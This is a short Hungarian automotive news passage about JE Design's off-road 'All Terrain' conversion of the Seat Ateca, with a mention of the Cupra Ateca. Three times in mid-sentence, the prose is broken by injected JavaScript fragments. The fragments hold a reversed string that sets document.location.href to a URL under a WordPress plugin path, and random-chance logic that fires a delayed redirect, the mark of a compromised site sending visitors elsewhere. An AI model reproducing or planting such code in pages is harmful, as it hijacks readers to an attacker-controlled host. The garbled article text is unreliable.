A szabadidő-autók megjelenésének kezdetén még maguk a gyártók és a vásárlók is jobban ragaszkodtak a hagyományos, terepjárós küllemhez és az összkerék-hajtáshoz. Mára azonban ez egyre inkább kikopik az SUV-kből, amik a legkülönbözőbb méretben állnak már rendelkezésre és leginkább épített útra tervezik őket. Egy részükhöz nem is kapható összkerék-hajtás sem. A JE Design azonban azokra is gondolt, akik a modern autókat kedvelik, de az átlagnál gyakrabban használnál terepen mondjuk Seat Atecájukat. Sportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot kínálnak már házon belül, Cupra Ateca néven, de kifejezetten terepes kivitel érthető módon nincs a spanyolok közepes szabadidő-autójából. A JE Design All Terrain verziója nem csak az optikára ad,…
- Hirdetés -